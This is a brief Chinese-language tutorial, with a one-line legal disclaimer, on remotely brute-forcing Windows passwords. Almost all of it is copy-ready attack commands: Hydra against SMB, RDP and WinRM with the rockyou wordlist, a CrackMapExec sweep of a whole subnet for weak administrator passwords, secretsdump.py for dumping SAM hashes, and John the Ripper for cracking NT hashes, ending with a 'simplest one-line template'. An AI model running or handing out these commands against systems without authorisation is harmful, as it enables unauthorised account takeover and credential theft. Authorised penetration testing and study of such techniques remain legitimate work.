⚠️ 重要声明:未经授权远程入侵、爆破他人 Windows 密码属于严重违法犯罪,本教程仅用于授权渗透测试、安全演练,非法使用后果自负。一、适用场景
- 目标开启了远程端口:SMB(445)、RDP(3389)、WinRM(5985/5986)
二、核心工具:Hydra(万能远程爆破)
Kali 自带,无需安装。
1. 爆破 SMB 共享密码(最常用)
hydra -l 用户名 -P 字典.txt 目标IP smb
示例:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.100 smb
参数:
2. 爆破远程桌面 RDP 密码
hydra -l administrator -P 字典.txt 目标IP rdp
3. 爆破 WinRM 远程管理密码
hydra -l administrator -P 字典.txt 目标IP winrm
三、批量扫描弱口令(CrackMapExec)
安装
apt install crackmapexec
扫描网段内 Windows 弱口令
crackmapexec smb 192.168.1.0/24 -u administrator -p 密码.txt
成功会显示:[+] IP:PORT IP:PORT STATUS:LOGIN
四、获取 Windows 哈希后破解(更高级)
1. 拿到 SAM 哈希(需已拿到权限)
secretsdump.py 域名/用户:密码@目标IP
2. 使用 John 破解哈希
john --format=nt hash.txt --wordlist=字典.txt
五、关键限制(必须知道)
- 现代 Windows 默认防御极强
- 公网 IP 几乎无法爆破
- 必须在授权环境下测试
六、最简一句话模板
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 目标IP smb